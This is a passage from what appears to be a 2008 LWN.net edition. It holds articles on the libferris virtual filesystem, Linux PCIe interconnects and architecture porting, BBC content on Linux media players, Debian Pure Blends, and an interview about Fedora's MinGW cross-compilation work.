have considered the legal and ethical landscape.  While there may be a
tendency to overestimate how widely applicable the data is—which the
authors warn against—it does provide a nice look under the covers of the
botnets delivering spam to one's inbox daily.


		The libferris virtual filesystem


The Unix mantra "everything is a file" gives you great flexibility
over where you store your data and how information is manipulated and
replicated. Unfortunately, many things in Unix and Linux are not
files, or ones that you might want to interact with anyway. For example,
a PostgreSQL database is ultimately stored in a collection of binary
files though you probably wouldn't want to interact with those files
directly. Instead of storing settings in a collection of tiny files,
many applications use XML to store settings in a single file but then
have to deal with parsing XML instead of just reading little files.
libferris lets you mount both PostgreSQL and XML and provides you with
a useful way to interact with the data contained in both as a virtual
filesystem.


Other operating systems like Plan 9 pushed the
envelope further than Unix, making more things "just a file". Unfortunately,
to use Plan 9 you had to abandon your trusty old Unix roots and jump to
an entirely new operating system.


I started the libferris virtual
filesystem project back in 2001 to push the "everything is a file"
concept further, it was all implemented on a Linux base.
Libferris is a virtual filesystem
implemented as a shared library with
FUSE bindings.
Because FUSE is
already in the Linux kernel you don't have to do any kernel patching
to use libferris. Because libferris is a shared library and not in the
kernel, it can use other libraries to help it mount data sources like
XML, relational databases and Emacs to name a few. And as an upshot of
being out of kernel, I can work on letting libferris mount anything I
like no matter how strange it might be without any third party
approval.


There are actually two ways to use libferris -- through a native C++
interface and using the normal Unix APIs with FUSE. The FUSE interface is
very useful if you want to rsync(1) some structured information from
an XML file into a PostgreSQL database. Just mount them both with FUSE
and rsync away. Another few interesting things you can do with the
FUSE interface is expose data as a virtual office
document using XSLT stylesheets that libferris processes for you
as well as geotagging with Google
Earth.


The design of libferris revolves around two primitives: exposing file contents as C++
std::iostreams, and rich metadata support through an interface similar
to Extended Attributes (EA) attr_get(3).  Since then
libferris has gained sophisticated support for indexing both the full
text contents of files as well as their metadata. Libferris is written in C++ and aims to take full advantage of the
language.  Interfaces are designed to be as easy to pickup for C++
programmers as possible, for example, displaying a directory can be
done using iterators, find(), begin() to
end() etc.


Both the types of things that libferris can provide as virtual
filesystems and the metadata handling are done through a plugin
interface. The handling of metadata is done through the Extended
Attributes (EA) interface.  This EA interface is also virtualized --
if you write an attribute to file:///foo/bar and the kernel
filesystem supports extended attributes, then the value will be saved
in a kernel level EA using attr_set(3). On the other hand if
file:///foo/bar happens to exist on a network filesystem that
does not support EA, then your value is saved in RDF by libferris. In
both cases the value can be read again using an identical interface.


Looking at filesystems in an abstract way -- a hierarchy of files,
file contents, and metadata associated with files and directories as
key-value pairs -- there is somewhat of a resemblance to the data
model of XML. Although there are obvious differences: XML elements can
have multiple text nodes as contents, an XML element does not need to
have specific unique names for each child XML element and so on. In
many cases it can be advantageous to smooth over the differences and
view a filesystem as XML and vice versa. Over the years libferris has
gained the ability to interact with it's virtual filesystems as
virtual Document Object Models (DOM)s. The reverse is also true, you
can take an xerces-c DOM and interact with it as a virtual
filesystem. Using virtual DOMs makes it easy to create a view of a
filesystem using a browser and XSLT. See xml.com
for information on using XQuery against a libferris virtual
filesystem.


The ability to mount XML and Berkeley db4 data as filesystems has long
been a part of libferris. If you want to store a filesystem inside a
platform independent format, then using XML is great, whereas the speed
of individual file look up in a Berkeley db4 database of many many
file records can come in handy.  Each format has its advantages, but
they are all just virtual filesystems as far as libferris is
concerned.


When a filesystem can offer what it likes through key-value pairs (EA)
associated with files, relational databases can also be viewed as a
virtual filesystem.  Databases, views, tables and result sets become
directories, tuples become files named by the value of their primary
key, and the individual values of tuples are exposed as Extended
Attributes on their tuple file. Again, PostgreSQL appears just like
another virtual filesystem. For relational data there are a few
caveats, for example, to create a new "file" in a table you must
supply at least the primary key EA as well as any EA which are
explicitly marked "not null" in the database.


Libferris will automatically mount many filesystems for the user. For
example, if you try to read an XML file as though it is a directory
then libferris will implicitly mount it as one for you. This does blur
the lines between what is a directory and what is a file in the
system. There is some additional metadata that libferris makes
available if you would like to avoid the automatic mounting. For
example, if you wish not to descend into XML files then read the
is-file metadata and if it is true do not attempt to descend into the
file.


One of the motivations for creating libferris as a project of its own
was to be able to expose anything that I felt could be interacted with
in an interesting manner as a filesystem as one. So libferris can
mount some things that folks might not think of as filesystems --
including Firefox, Emacs, DBus, LDAP, Evolution, Amarok, klipper, xmms,
X Window System and gphoto2.


The metadata plugins for libferris currently support extracting
information from file formats automatically, for example, EXIF, XMP
and ID3 tags. Metadata overlays are also supported, so you can see
what tags you have associated with an image in f-spot through extended
attributes in libferris. I use the term overlays because a central
repository of tag data (in this case from f-spot) is scattered over an
entire filesystem in libferris. The lower level metadata plugins
handle more standard extended attributes usage, for example using
attr_set(3) to store values or saving them in RDF.


Many of the standard utilities have been rewritten to use the native
libferris API and take advantage of extra features it offers. Things
like ls, cp, mv, rm, cat, io-redirection, touch, head and tail all
have native libferris versions which are shipped with the main
tarball. These all also serve as code samples for how to use the
libferris API. Extensions to the normal clients include the ability to
output directory listings in XML for ferrisls, ferriscp has the
ability to use memory mapped IO as well as the more standard
open(), read() and write() calls to perform the
copy. Using memory mapped IO this way also uses the madvise(2)
MADV_SEQUENTIAL call to let the kernel correctly select caching
policy.


The indexing support in libferris is also handled using plugins. Two
different indexing plugin types exist; full text and metadata.  There
are two types of plugin, because the strategy for how to create an
index can be quite different depending on if you are performing a
search for some words in a document text or if you wish to find files
with certain metadata values. Using inverted files can be great for
resolving a ranked full text query for "alice wonderland" but finding
all files in either my home directory or /pictures that have
been modified in December 2008 can be solved in a number of ways.


There are currently indexing plugins for CLucene, Lucene, LDAP,
Federations of other libferris indexes, ODBC, PostgreSQL, Redland
(RDF), Xapian, Beagle, Strigi and some custom designs. There are
likely to be more index plugins explicitly designed to work on NAND
Flash in the future. Those interested in indexing and libferris should
see this article.


A major advantage of closely combining the index and search operations
into the virtual filesystem is that anything the virtual filesystem
can see can be indexed.  When searches are performed you should also
be able to interact with any of the results as a virtual
filesystem. This avoids the issue where a discrete search library
might return a URL that the client can not do anything with.


So, what does it look like to code using libferris? Most objects in
ferris are smart pointers, many using intrusive reference
counting. The type for such objects is prefixed with "fh_" to indicate
a ferris handle. The notion of files and directories is amalgamated
into a single "Context" abstraction.  To get a smart pointer to a
filesystem path the Resolve() function is used.  So without
further ado, to get a file and its metadata with libferris:


Libferris is steadily gaining commercial interest. Currently I provide
things like custom builds of libferris, explicit support for new test
cases in the core regression test suite that are important to clients
and of course extensions to libferris to perform a specific task that
might be desired.


There are 
packages available for both 32 and 64-bit Fedora  
8,
9
and Ubuntu 7.10 gusty
as well as 32bit packages for 

openSUSE 10.3. Unfortunately there is currently a bug in building
64bit stldb4 on openSUSE.  Install the libferris-suite package to pull in
all the dependencies.


Feel free to email the witme-feris
mailing list or add comments to this article suggesting any weird and
wonderful (and obscure) filesystems you have experienced in the
past. Though my libferris.TODO file always grows more than it shrinks,
I'm always happy to add new and exciting suggestions near the top of
it.


		UKUUG: Arnd Bergmann on interconnecting with PCIe


PCI express (PCIe) is not normally considered as a way to connect
computers, rather it is a bus for attaching peripherals, but there are
advantages to using it as an interconnect.  Kernel hacker Arnd Bergmann gave a
presentation at the recent UKUUG Linux 2008
conference on work he has been doing on using PCIe for IBM.  He
outlined the current state of Linux support as well as some plans for the
future.


The availability of PCIe endpoints for much of the hardware in use today is
one major advantage.  By using PCIe, instead of other interconnects such as
InfiniBand, the same
throughput can be achieved with lower latency and 
power consumption.  Bergmann noted that avoiding using a separate
InfiniBand chip saves 10-30 watts which adds up rather quickly on a 30,000
node supercomputer.


There are some downsides to PCIe as well. There is no security model, for
example, so a root process on one machine can crash other connected machines.
There is also a single point of failure because if the PCIe root port goes
down, it takes the network with it or, as Bergmann puts it: "if
anything goes wrong, the whole system goes down".  PCIe lacks a
standard high-level interface for Linux and there is no generic code shared
between the various drivers—at least so far.


As an example of a system that uses PCIe, Bergmann described the
"Roadrunner" supercomputer that is currently the fastest in existence.  It
is a cluster of hybrid nodes, called "Triblades", each of which has one
Opteron blade along 
with two Cell blades.  The nodes are connected with
InfiniBand, but PCIe is used to communicate between the processors within
each node by using the Opteron root port and PCIe endpoints on the Cells. 


There is other hardware that uses PCIe in this way, including the Fixstars
GigaAccel 180 accelerator board and an embedded PowerPC 440/460
system-on-a-chip (SoC) board, both of which use the same Axon PCIe device.
Bergmann also talked about PCIe switches and non-transparent bridges that
perform the same 
kinds of functions as networking switches and bridges.  Bridges are called
"non-transparent" because they have I/O remapping tables—sometimes
IOMMUs—that can be addressed by the two root ports that are connected via
the bridge.  These bridges may also have DMA engines to facilitate data transfer
without host processor control.  


Bergmann then moved on to the software side of things, looking at the
drivers available—and planned—to support connection via PCIe.
The first driver was written by Mercury Computers in 2006 for a Cell
accelerator board and is now "abandonware".  It has many deficiencies and
would take a lot of work to get it into shape for the mainline.


Another choice is the driver used in the Roadrunner Triblade and the
GigaAccel device which is vaguely modeled on InfiniBand.  It has an
interface that uses custom ioctl() commands that implement just
eight operations, as opposed to hundreds for InfiniBand.  It is
"enormous for a Linux device driver", weighing in at 13,000
lines of code.  


The Triblade driver is not as portable as it could be, as it is very
specific to the Opteron and Cell architectures.  On the Cell side, it is
implemented as an Open Firmware driver, but the Opteron side is a PCIe
driver.  There is a lot of virtual ethernet code mixed in as well.
Overall, it is not seen as the best way forward to support these kinds of
devices in Linux.


Another approach was taken by a group of students sponsored by IBM who
developed a virtual ethernet prototype to talk to an IBM BladeCenter from a
workstation by way of a non-transparent bridge.  Each side could access
memory on the other by using ioremap() on one side and
dma_map_single() on the other.  By implementing a virtio driver,
they did not have to write an ethernet driver, as the virtio abstraction
provided that functionality.  The driver was a bit slow, as it didn't use
DMA, but it is a start down the road that Bergmann thinks should be taken.


He went on to describe a "conceptual driver" for PCIe endpoints that is
based on the students' work but adds on things like DMA as well as
additional virtio drivers.  Adding a virtio block device would allow
embedded devices to use hard disks over PCIe or, by implementing a Plan 9
filesystem (9pfs) virtio driver, individual files could be used directly
over PCIe.  All of this depends on using the virtio abstraction.


Virtio is seen as a useful layer in the driver because it is a standard
abstraction for "doing something when you aren't limited by
hardware".  Networking, block device, and filesystem "hosts" are all
implemented atop virtio drivers, which makes them available fairly easily.
One problem area, though, is the runtime configuration piece.  The problem
there is "not in coming up with something that works, but something that
will also work in the future".  


Replacing the ioctl() interface with the InfiniBand verbs (ibverb)
interface is planned.  The ibverb interface may not be the best choice in
an abstract sense, but it exists and supports OpenMPI, so the new driver
should implement it as well.


Two types of virtqueue implementations are envisioned, one for
memory-mapped I/O (MMIO) and the other for a DMA-based virtqueue.  The MMIO
would be the most basic virtqueue implementation, with a local read of a
remote write.  Read access on PCIe is much slower than write because a read
must flush all writes then wait for data reception.  Data and signaling
information would have separate areas so that data ordering guarantees
could be relaxed on the data area for better performance, while strict data
ordering would be set for the signalling area.


The DMA engine virtqueue implementation would be highly hardware-specific
to incorporate performance and other limitations of the underlying engine.
In some cases, for example, it is not worth setting up a DMA for transfers
of less than 2K, so copying via MMIO should be used instead.  DMA would be
used for transferring payload data, but signaling would still be handled
via MMIO.  Bergmann noted that the kernel DMA abstraction may not provide
all that is needed so enhancements to that interface may be required as
well.


Bergmann did not provide any kind of time frame in which this work might
make its way into the kernel as it is a work in progress.  There is much
still to be done, but his presentation laid out a roadmap of where he
thinks it is headed.  


In a post-talk email exchange, Bergmann points to his triblade-2.6.27
branch for those interested in looking at the current state of affairs, while noting that it "is only mildly related to what I think
we should be 
doing".  He also mentioned a patch by Ira Snyder that
implements virtual ethernet over PCI, which "is more
likely to go into the kernel in the near future".  Bergmann
and Snyder have to agreed to join forces down the road to add more
functionality along the lines that were outlined in the talk.


		BBC opens a little more content for Linux


The British Broadcasting Corporation (BBC) has long dabbled with free
software, starting a number of 
new projects
and opening content via their
backstage
developer network. Now they've

announced
a bold new step forward, releasing an experimental service—initially
just for Linux users—with open access to some multimedia content,
which has 
already spun out in unexpected ways. 


The BBC's
Research and Innovation
team took a fairly conventional commissioning process for this
experiment. Having identified the feature—help existing content to
"surface" in multimedia applications, so users don't need to browse around the
web site—they went on to find the right approach. George Wright and
his team 
settled on integrating BBC content into the Totem media player with
Canonical, aiming to get a first version out with the recent Intrepid
release. Things then moved quickly. Discussions with the company contracted
to do the Totem work (Collabora) started in spring 2008, although according
to Christian Schaller from Collabora "it was probably around July
things got concrete". Over a few autumn months the work was
completed, opening up a large number of radio shows to Ubuntu users
worldwide (although much of the content is restricted to the UK because
that's who pays the TV license that funds the BBC). 


This great new feature, exclusive to Ubuntu, was promoted in the

Intrepid press release
but received little attention in the media. Given that it still only
delivers a fraction of the content you can get through iPlayer (proprietary
Windows software full of DRM technology) this is hardly surprising. That
you can stream Dirac-encoded videos released under Creative Commons
licenses is obviously still a bit geeky for most. 


But that doesn't stop free software developers. Barely days after the Totem
announcement, Nikolaj Hald Nielsen wrote 

a script
to neatly integrate the content in Amarok 2.0. As a core Amarok developer
his main motivation was familiar: "I wanted to inspire other people
to write similar scripts for Amarok 2, and I think it is important to have
some good example scripts ready when Amarok 2.0.0 final is
released." I've been watching the Amarok 2 betas come along, and
having given the "get more features" dialogs in KDE a miss over the past
few years, I was pleasantly surprised how well this worked. You just go to
the script manager, click to get some more scripts, install the BBC script
and—like magic—you get all the BBC content in the "internet" tab on
the left. 


Wright's team did all the hard low-level work to make this kind of
adaptation straightforward. The Amarok script has delighted Wright, who is
a long-time Amarok user; they've even been in touch with Nielsen to see how
they can help improve the integration. 


The question everyone wants an answer to is: will this ever match iPlayer
for content range? Wright's team have a fairly wide remit, but they're not
in charge of releasing content, so this is unlikely to change the
Corporation's attitude towards DRM overnight. According to Wright, the
content teams have given great feedback, but over the past five years we've
seen promises of an open Creative Archive wither away, with a
consumer-facing focus on proprietary products like iPlayer. Truly open
content from the BBC, or even the volume of copyrighted-but-available
archives released by the National Public Radio (NPR) in the US (also 

integrated into Amarok
), is probably still a long way off.


This new service is strictly experimental, Wright says, "it's a way
to experiment with distribution platforms and free software."
They've also learned a lot more about developing in a free software
community; although many of them have been Linux users for years, this was
a first for them. Working to the feature freezes for Gnome and Ubuntu
Intrepid meant the UI isn't a nice as they might have hoped, but it's a
great start. 


The open service is here to stay. They're not sure if they'll keep
developing the Totem feature and patching against mainline in Ubuntu or
Totem; time will tell. More work between Collabora, the BBC, and Canonical
is also uncertain. But, since the code is all open, we can definitely expect
the Totem and Amarok features to be maintained. We can also look forward to
more open content integrated into free desktops in the future in a way
that is extremely difficult to do with proprietary platforms. 


		Blending Debian


Last week we introduced Debian Pure Blends,
and now this week we'd like to look a bit deeper into the concept, the
white paper and how this idea compares to similar ideas.

To begin with, the Pure Debian Blend is not a new idea.  It's a new name
for an existing concept that goes back to early 2004.  Discussions probably
started earlier, but April 2004 is when a mailing list was opened
for this topic.

At DebConf5, held in Helsinki, Finland in July of 2005, there were talks
about Debian Derivatives and Custom Debian
Distributions.  Custom Debian Distributions (CDD) was the previous name
for Debian Pure Blends and the derivatives are now forks.

A white paper, available in PDF or
HTML, was
originally written in 2004 to describe the the CDD concept.  It has been
recently modified for the new name of Debian Pure Blends.

There are a few places in the white paper where its age shows.  These are
mostly references to distributions other than Debian.  You'll find some
mention of Mandrake, for example.  The combined Mandrakesoft and Conectiva
forming the new entity Mandriva was finalized later in 2004.  Debian 3.0
(Woody) appears to have been the stable version when the document was new.
Since then Debian has released 3.1 (Sarge) and 4.0 (etch), and is nearing
the 5.0 release (Lenny).

While the dates are old, the whole stands as a definition of what is a Pure
Blend and what is a fork.  The Pure Blend is based on Debian stable
(currently etch).  It contains only packages found in the stable
repository.  A Pure Blend must retain 100% compatibility with the stable
repository.  A system administrator using a pure blend could easily install
additional packages from Debian's sizeable repository.  It is not uncommon
for one or more developers of a Pure Blend to also be Debian Developers who
are able to maintain the packages needed by the Blend within the Debian
archive.  The document is also a valuable resource for anyone who wishes to
create their own Pure Blend.

The list of forks in section 5.1.1 could use some attention, although this
is not really important to the overall topic.  Currently listed are
Linspire, Xandros and Libranet.  Libranet died in 2006 following the death
of it's founder Jon Danzig.  Linspire was acquired by Xandros earlier this
year and what was Linspire is now part of Xandros.  The free version of
Linspire, called Freespire, is still around.  Roughly speaking, Freespire
is to Xandros as Fedora is to Red Hat.  A community project to test drive
new technologies which may find their way into the enterprise
distribution.

Whether Freespire is a fork or something more pure remains to be seen.
Freespire 5.0 is not finalized yet.  It appears that Freespire will wait
for the official Debian 5.0 (Lenny) release before its final 5.0 stable
release.

Another fork that might be mentioned here is Ubuntu.  This popular
distribution didn't exist when this document was originally created.  The
first Ubuntu release was 4.10 preview (Warty Warthog), dated September
2004.  Ubuntu is clearly a fork though, based on Debian's unstable branch,
known as sid.  Packages from Debian's stable repository might work on
Ubuntu, but that is by no means a sure thing.

So how does this compare to other distributions?  At this time Debian
remains the most popular base, whether the spinoff is Pure or a fork.  This
is largely due to the size of Debian's repository.  There are simply more
packages to chose from.  Fedora's repository has about half the number of
packages, but it continues to grow.  Fedora would like to become more
widely used as a base.  The project is still working on a draft of trademark
guidelines, where a "Spin" is much like a Pure Blend and a "Remix" is
more of a fork.  Spin maintainers are welcome to become Fedora contributors
and package the free software needed by the Spin.

Red Hat addressed this issue some years ago, when Red Hat Enterprise
spinoffs flourished following the demise of the old Red Hat Linux
distribution.  Red Hat made separate packages with its logos and trademark
so that spinoffs could more easily take the free software, without the
commercial baggage.  At first separating the logos from the free software
was a difficult process.  Debian has an official logo and an unofficial
logo, for other projects to use.  Fedora is coming up with its own rules,
with the draft
trademark guidelines.  The terminology for spinoffs varies as well.  A
Fedora Spin is mostly equivalent to a Debian Pure Blend.  A Fedora Remix is
more of a fork.

Regardless of what they are called, these spinoff distributions make the
free software landscape a richer and more diverse place.

		UKUUG: The right way to port Linux


Arnd Bergmann pulled double duty at the recent UKUUG Linux 2008
conference by giving a talk on each day of the event.  His talk on
Saturday, entitled "Porting Linux to a new architecture, the right way",
looked at various problems with recent architecture ports along with a
project he has been working on to simplify that process.  By creating a
generic template for architectures, some of the mistakes of the past can be
avoided. 


This is one of Bergmann's pet projects, that "I like to do for fun,
when I am hacking on the kernel, but not for IBM".  The project and
talk were inspired by a few new architectures that were merged—or
were submitted for merging—in the
last few years.  In particular, the Blackfin and MicroBlaze architectures
were inspiring, with the latter architecture still not merged, perhaps due
to Bergmann's comments.  He is hoping to help that situation get better.


The biggest problem with architecture ports tends to be code duplication
because people start by copying all of the files from an existing
architecture.  In addition, "most people who don't know what they are
doing copy from x86, which in my opinion is a big mistake".
According to Bergmann, architecture porters seem to "first copy the
header files and then change the whitespace", which makes it
difficult to immediately spot duplicated code.


He points to termbits.h as an example of an include file that is
duplicated in multiple architectures unnecessarily as the code is the same
in most cases.  He also notes there is "incorrect code
duplication", pointing to new architectures that implement the
sys_ipc() system call, resulting in "brand new architectures
supporting a broken interface for x86 UNIX from the 80s".  That call
is a de-multiplexer for System V IPC calls that has the
comment—dutifully duplicated into other architectures—"This is
really 
horribly ugly".


Then there are problems with "code duplication by clueless
people" which 
includes a sembuf.h implementation that puts the padding in the
wrong place because of 64 vs. 32-bit confusion.  In addition, because
code is duplicated in multiple 
locations, bug fixes that are made for one architecture don't propagate to
all the places that need the fix.  As an example he noted a bug fix made by
Sparc maintainer David Miller in the x86 tree that didn't make it into the
Sparc tree.  Finally, there are ABIs that are being needlessly propagated
in new architecture ports: system calls that are implemented in terms
of newer calls are still present in new ports even though it could all be
handled in libc.


The "obvious" solution is to create a generic architecture implementation
that can be 
used as a starting point for new ports.  Bergmann has been working on that,
resulting in a 3000 line patch that "should make it very easy for
people to port to new architectures".   To start with, it defines a
canonical ABI that is a list of all of the system calls that need to be
implemented for a new architecture.  It puts all of the required include
files into the asm-generic directory that new ports can just
include—or copy if they need to modify them.   


Unfortunately, things are not quite that simple of course, there are a number
of problem areas.  There are "lots of things you simply cannot do in
a generic way".  Most of these things are fairly hardware-specific
areas like MMU support, atomics, interrupts, task switching, byte order,
signal contexts, hardware probing and the like.


Bergmann decided to go ahead by defining away some of these problems in
his example architecture.  So, there is no SMP or MMU support with the
asm-generic/atomic.h and asm-generic/mmu_context.h
include files being appropriately modified.  Many of the
architecture-specific functions have been stubbed out in
arch/example/kernel/dummy.c so that he can compile the template
architecture. 


The example architecture uses an Open Firmware device tree to
describe the hardware that is available at boot time.  Open Firmware
"is a bit like what you have with the new Intel EFI firmware, but
it's a lot nicer".  A flattened device tree data structure is passed
to the kernel at boot time by the bootloader, so Bergmann will be able make
it to the next step: making it boot.


As one might guess, there is still more work to be done.
There are eight header files that are needed from the
asm-example directory, but Bergmann hopes to reduce that some.  He
notes that there are other architecture-specific areas that need work.  For
example, 
every single architecture has its own implementation of TCP 
checksums in assembly language, which may not be optimal


Bergmann pointed attendees at the ukuug2008 branch of his
kernel.org playground git tree: git://git.kernel.org/pub/scm/linux/kernel/git/arnd/playground.git
to see the current state of his example architecture.  It looks to be a
nice addition to the kernel that will likely result in better architecture
ports down the road.


		MinGW and why Linux users should care


The Minimalist GNU for Windows (MinGW)
project is a way to get GCC and tools like binutils working to build
software for the
Windows environment—something that might not sound very interesting
to Linux users or developers.  But there are a number of
advantages to porting and 
regularly testing free software on Windows, as Red Hat's Richard Jones and
Dan Berrange explain in the following interview.   Richard and Dan also
describe Red Hat's involvement, how developers can
participate, as well as how it all helps the free software cause.


LWN: Could you describe the MinGW project?  How did it get started?


Richard: For some time I have been making Windows builds of libvirt 
 available and, frankly, it was a real chore.  I
needed a Windows virtual machine to do it.  But Windows is so
frustrating to use and maintain: it doesn't come with any of the tools
such as shells or version control that we are used to, and because I
was only doing builds once a month or so I'd go back to it and find
something had gone wrong that would require maintenance or even
reinstallation.

During this time, we didn't routinely build libvirt for Windows.  New
code would inevitably break something.  I had to fix things on
Windows, then copy the code back to Linux and check that my fixes
didn't break the Linux build, then come up with a patch, and all of
this was complicated by the fundamental incompatibility of Windows
with the rest of the world -- even simply copying code back and forth
is irritatingly difficult when one machine is a Windows machine.
(There's no ssh or scp or tar, files get executable bits set or have
CRLF line endings, etc.)

At the same time we were getting a strong demand for the rest of our
virt tools  on Windows.  Enough was
enough. 
We decided that the only way to deal with this was to remove Windows
from the equation.  We wanted to build and test libvirt and the virt
tools for Windows routinely (daily or more often), from the Fedora
host, using the normal development environment.  The way to do this is
through cross-compilation (the Fedora MinGW project) and testing under
emulation (Wine).

Debian &amp; Ubuntu have been shipping the MinGW cross-compiler for quite
a while, but it's important to say that the cross-compiler itself is
the easy bit.  The hard part about this project are the 50+ libraries
and development tools that we ship and maintain alongside.  Without
those, just having the cross-compiler is fairly useless.


Dan: The libvirt project started a few years ago to provide an API
for managing Xen virtualization hosts. Initially it was just a locally
accessed C library, but over time the project expanded in scope to
allow remote RPC access to the management APIs, and over other
virtualization technology like QEMU, KVM, OpenVZ, LXC (native Linux
containers) &amp; User-Mode Linux. Shortly after we added support for RPC, a
number of community members expressed an interest in using the client
side from the Windows platform to manage their Unix hosts.
Periodically people would contribute patches to make libvirt build on
Windows, but soon after they were applied, new unrelated work would
break the Windows build again.

It became clear that if the libvirt community was to officially
support building a Windows client, then all developers needed to
be able to easily test builds for Windows. The obvious stumbling
block here is that most of our community developers do not use or
even own Windows machines for testing. The MinGW project provides
a cross compiler toolchain and stubs for the Win32 APIs to allow
building of Windows executables and DLLs from a Linux host. Add
in WINE and you can also run your cross-compiled build. MinGW and
WINE are completely open source, so we can provide a very good
level of support without ever having to purchase a Windows license
or leave our primary Linux development environment.

We are not the first people to see the value in MinGW for supporting
Windows platforms in open source software. Prior to the the start
of the Fedora MinGW effort, Fedora developers would have to build all
the cross compilers &amp; libraries themselves. This is not particularly
hard, but it is a lot of wasted effort to have everyone duplicating
the work. Providing the MinGW compiler toolchain, and important
libraries such as libxml, gnutls, libpng, libjpeg, GLib, GTK, etc
directly in the Fedora repositories enables developers to focus on
their own code, rather than the cross-compilers.


LWN: What is Red Hat's involvement in MinGW?


Richard: Dan and I work for a Red
Hat group responsible for fostering the 
development of new tools and technologies.  We
have an eye to productisation and I spend quite a lot of time going to
customer conferences and asking them what they want to see, but as for
whether MinGW will make it into some future supported Red Hat product
I cannot say.

Dan: Red Hat initiated development on the libvirt project and
supports its ongoing evolution with significant developer
resources. Red Hat wants the libvirt project to be the de facto
standard for managing virtualization hosts, and the project community
members want Windows to be a supported client platform. The work we
are doing on the MinGW project in Fedora is thus a response to demand
from the libvirt community for better Windows support in our
releases. It is just a small part of our day job, alongside major
libvirt feature development for Linux systems and in particular KVM &amp;
Xen.


LWN: Why does Red Hat care?  Are you going into the Windows software
  business now?


Richard: Red Hat certainly cares about libvirt, and making libvirt
available on the widest range of platforms.  The alternatives to
libvirt are interfaces like XenAPI and VMWare's APIs, which lock
customers into proprietary technologies.  Any way we can make it
easier to provide open APIs and open source software even on closed
platforms like Windows is a win for Red Hat, the Linux community,
and even for Windows users.

Dan: As Richard says, this effort isn't about any particular Red Hat
product. It is a community focused effort to address demand from
libvirt users for better Windows client support. People are interested
in open source virtualization technology like Xen and KVM, as an
alternative to closed source solutions. Open source exists in a
heterogeneous world though, and even if someone decides to migrate their
servers to virtual machines on a Linux KVM host, they may still need
to manage these servers from a Windows desktop. The MinGW project
helps us maintain a reliable client build for the Windows platform,
and thus lets a broader spectrum of users take advantage of open
source virtualization technology. Growing the size of the libvirt
community, and encouraging use of virtualization is what is important
to Red Hat, and the MinGW project is one small part of that effort.


LWN: Why should free software developers care about MinGW?  Does it do
  anything for them?


Richard: There's been some opposition, along the lines of "why are we
helping Windows?".  IMHO people who say that are ignoring both history
and reality.  First the history bit: the GNU project started off as a
set of better compilers and command-line tools for the proprietary
Unix systems of the day.  I remember before Linux was around that
you'd get some horrible system like HP-UX or (in my case) OS-9, and
the first thing you would do would be to install all the GNU tools.
Without real GNU grep, make, awk, bash, those systems were less than
useful.  Eventually when GNU got a kernel (Linux) we moved over to
that system because it came with all the good tools.

Second the reality bit: Windows users are locked into proprietary
applications and file formats, everything from Photoshop to QuickBooks
to MSN to Illustrator.  No Windows user can switch without first
switching all their applications, which is going to be a very long
transition process.  Therefore we need a way to enable the developers
of Gimp, GnuCash, Pidgin, Inkscape (to pick four out of hundreds) to
easily build and test their software for Windows, so they can ship
their software for Windows, respond easily to bug reports, and break
that proprietary lock-in.  Fedora MinGW does this - in fact we already
used our compiler and huge chain of libraries to port
Inkscape. 


[PULL QUOTE: 
Another thing we've found in porting to other platforms, is that it
can generally improve the quality of the codebase. Different compilers
and runtime environments expose different bugs in an application. The
more combinations you can regularly build &amp; test on, the better the
overall quality of your code.
 END QUOTE]


Dan: The libvirt project started off with a strong Linux focus due
to our immediate needs for a management API for Xen in Fedora and
later RHEL-5. Over time the community has contributed patches to
improve our portability to non-Linux platforms, in particular Solaris
and more recently Windows. While Red Hat's focus is on Linux, enabling
portability to other platforms is important because it grows the size
of your developer community. Every significant open source project has
a huge wishlist of features and nowhere near enough developers and
testers to address them all. Cross-platform portability enlarges the
pool of potential contributors. They may initially only send minor
patches to fix portability bugs for Windows, but over time they can
end up working on major new features that benefit every platform.

Another thing we've found in porting to other platforms, is that it
can generally improve the quality of the codebase. Different compilers
and runtime environments expose different bugs in an application. The
more combinations you can regularly build &amp; test on, the better the
overall quality of your code.


LWN: Is there anything in particular that developers should keep in mind to
  make life easier for people building their code for MinGW?


Richard: My pet list would be:


 Don't write your own build system.  Use autoconf/automake/libtool
   or cmake.  That's not to say I'm a great fan of autoconf, but
   these really do make cross-compilation almost trivial.

   Autoconf-based programs can generally be cross-compiled by doing:


 Don't try to run executables during the build phase.  It doesn't
   work when you're cross-compiling.


 Do use pkg-config.  And if you can't use pkg-config, then make sure
   your *-config program is a shell script, not a binary.


 Do use common, portable libraries such as glib, gtk, libvirt or
   any of our 
   other libraries.


 Please use Fedora MinGW to routinely cross-compile your own code
   for Windows.


Dan: I have been pleasantly surprised at just how easy it has been to
build many open source libraries with MinGW. Despite almost universal
dislike for autotools, the applications which use autotools have been
some of the easiest to port, particularly when it comes to building
DLLs. The apps with home-brewed build systems have been much more
involved. I definitely echo Richard's suggestion to stick to a broadly
supported build system like autotools or cmake.

Any project which is serious about enabling support for Windows in
their releases should make sure they are running regular automated
builds &amp; tests of their codebase. This is actually just good sense
for any software engineering project regardless of whether Windows
support is desired - it just happens to be particularly useful for
configurations that developers rarely test on a day-to-day basis
to avoid otherwise unnoticed regressions.

If you are not using a support library like GLib, QT or NSPR (which
provides a degree of cross-platform portability) then seriously
consider making use of Gnulib. This is a library of
code which you 
can drop into an application, fixing POSIX API portability problems
on various platforms. As an example, it replaces Winsock's socket()
call so it returns real file descriptors that you can use in both
read() and recvfrom(). It can't fix all problems - such as the lack
of fork()/exec() on Windows - but if your application / library
is written against POSIX, using Gnulib will significantly improve
your portability across all Linux, UNIX and Windows platforms.


LWN: What are the biggest challenges that your project faces now?  How can
  the community help?


Richard: Scaling the project is a big challenge.  Red Hat dedicates quite
limited resources to this project.  The only way we can scale it is if
the application developers themselves start to use our tools to build
and maintain their own programs.  I would like to see everyone who has
an important Linux app or library start building and shipping for
Windows routinely.  Bringing open APIs, apps and file formats to
Windows users is important: It's important to Windows users because it
breaks their lock-in and makes switching to a fully free platform
easier down the road.  It's important for you, because your potential
audience of users will increase by a factor of 10x or 20x.

Dan: Spreading the package maintenance job across a larger number
of Fedora members is an important task. There is a limit to how many
packages a single person can do a good job at maintaining. To make
it manageable we track &amp; pull patches from the native builds to the
MinGW cross-compiled builds of common packages. Ultimately we still
need more package maintainers to look after the cross-compiled builds.

There are some core pieces of the open source ecosystem which do not
work / are not fully portable to a Win32 environment. The most obvious
one being DBus, which is used by an ever increasing number of apps
for local RPC. There have been a number of efforts to port DBus, but
none ever completely finished &amp; merged into the official releases.


LWN: Anything else you'd like to say to LWN readers?


Richard: Get
involved. 

Dan: Cross platform portability is often beneficial to your project
even if you personally only care about its use in Linux. In the libvirt
